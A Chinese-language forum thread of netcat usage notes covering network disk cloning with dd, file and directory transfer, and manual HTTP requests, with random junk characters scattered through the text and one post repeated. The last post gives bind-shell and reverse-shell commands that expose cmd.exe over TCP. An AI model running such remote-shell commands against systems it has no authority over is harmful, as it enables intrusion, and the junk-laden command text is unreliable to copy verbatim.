找回密码
 注册
楼主: admin

tcpdump 、nc的使用记录

[复制链接]

1

主题

0

回帖

12

积分

管理员

积分
12
QQ
 楼主| 发表于 2017-3-9 19:00:07 | 显示全部楼层
克隆硬盘或分区) E, X" I- n  f( n
操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。
- P& x5 j* S1 e7 y; m克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:+ J8 w. g# t+ |+ G9 p: z0 g
# nc -l -p 1234 | dd of=/dev/sda) @( a1 L( u) O6 h% ?& |

* ?2 s6 s1 `- f2 D6 {& }  u! T* L' Jserver1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:) e8 I* K4 P& O
# dd if=/dev/sda | nc 192.168.228.222 1234' `2 Y# |" p- u$ `) _3 _
6 `# Y, M* p" c0 H0 X* {5 q( W
※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。

1

主题

0

回帖

12

积分

管理员

积分
12
QQ
 楼主| 发表于 2017-3-9 19:01:51 | 显示全部楼层
克隆硬盘或分区
7 f3 Q# `  Z+ u( C操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。
  p3 c- y3 B2 S克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:, S9 A# q1 n8 R% @) g/ ~' k7 ]7 `
# nc -l -p 1234 | dd of=/dev/sda
# N9 N8 b& g8 |9 ^ ' C% G: [& P& D' m( ]! F( B; h8 H& `% j) B
server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:
3 u) S2 Q( S. m# dd if=/dev/sda | nc 192.168.228.222 1234" {  k! R2 S; H% o. b) n
; o! W( z7 A1 e4 H; g
※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。

70

主题

73

回帖

1201

积分

网站编辑

积分
1201
发表于 2017-3-9 19:09:26 | 显示全部楼层
保存Web页面; x7 _3 r4 C" A' L' \
# while true; do nc -l -p 80 -q 1 < somepage.html; done

70

主题

73

回帖

1201

积分

网站编辑

积分
1201
发表于 2017-3-9 19:12:51 | 显示全部楼层
模拟HTTP Headers,获取网页源代码和返回头部信息
; s7 d$ H+ V0 c4 t3 M7 q
6 \, D0 Y3 ]) r. @  }9 d. |2 X[root@hatest1 ~]# nc www.linuxso.com 80
4 l3 A$ |9 \6 W" c, Q0 cGET / HTTP/1.17 u/ _( ?9 [7 ?4 p$ Y4 i
Host: ispconfig.org
& X5 ?! \' k. a" o* R; AReferrer: mypage.com
* x& e% {+ p$ c0 e% VUser-Agent: my-browser0 c3 Z$ |7 r# k$ ^' N  {' b6 |

" o; _4 B6 C9 D" r, B$ [% AHTTP/1.1 200 OK
: f5 U$ }* d! TDate: Tue, 16 Dec 2008 07:23:24 GMT$ \+ I/ w/ i- S
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
1 T) R$ D8 Y' J% T, i3 J, GSet-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
& q5 \9 L1 @: Z4 r  P  k) b+ rExpires: 0
% b5 X9 f, ?0 ^- U( S5 ^& |Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=02 R5 `$ o/ x7 @& r
Pragma: no-cache
, _) A: y. v/ n. V9 E. BCache-Control: private, post-check=0, pre-check=0, max-age=0
2 O; T) r! L) G! L% e+ F- OSet-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
2 O) G9 c6 C1 e3 I. }8 x4 D# \5 @Vary: Accept-Encoding; O7 \1 C5 [0 p. l) \7 i4 @1 W
Transfer-Encoding: chunked  B3 v. x) A. n
Content-Type: text/html0 y* A9 L3 L" j/ \# V; G
[......]
, f: F, A. P% L* `% `% n- v+ p在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。
0 C; u1 H' r8 {: N) I4 J+ L6 }! |1 a0 j# g- X; l
7 z' }" z7 Y2 C1 K* G

. ]0 S6 M2 [- v3 _. s/ p3 w传输目录
3 R8 {! t9 g3 I6 f从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上,用nc激活监听,server2上运行:6 x1 K, U; `0 _3 Y
引用
( i# V3 f: J. [ - I1 G9 S. J2 @( ]5 N0 `
[root@hatest2 tmp]# nc -l 1234 |tar xzvf -3 M! G1 I. F5 w
server1上运行:! [  i/ `; x8 D, r& y2 c* i
引用0 H8 q, j$ M: Z8 }, ]+ o
! m* e% k2 y9 }/ [: q+ m% I
[root@hatest1 ~]# ll -d nginx-0.6.34( m( f) k* D3 X
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.341 |+ B; K: ]& D4 j. N* G
[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234
2 r  _+ i& N2 b4 _9 G
/ z, G5 J* d$ D! _- W
" L( b4 E' H$ P9 n0 x3 z. T. h1 k1 [0 O) z4 J7 W( E
REMOTE主机绑定SHELL
- C* s, t7 f) O- l" E例子:* w; }- r; c2 j# N

0 _, z. _, ^3 Q1 ?格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
" A, _' b; d# v讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口! l8 w3 f3 O; _% ^
' w4 J7 b: c% D8 b- e8 q
1 q" A- `( z0 F, O! c" E+ a
REMOTE主机绑定SHELL并反向连接8 N: ?" _9 J" q0 p* V9 Q6 G
例子:8 Y7 t/ T* }# p" Z0 @3 c% ^
& K+ ^3 W! G! g" n" X! \
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354! S8 p( u2 ^' z+ A
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
* Q& K" \6 T/ j! K' {以上为最基本的几种用法(其实NC的用法还有很多,
7 [  @  ~3 m$ y9 R( v( l当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)3 Z: _- y* `) S8 f8 \0 s
您需要登录后才可以回帖 登录 | 注册

本版积分规则

返回首页|Archiver|手机版|小黑屋|易陆发现技术论坛 ( 蜀ICP备2026014127号-1 )

GMT+8, 2026-6-12 01:28 , Processed in 0.020272 second(s), 21 queries .

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表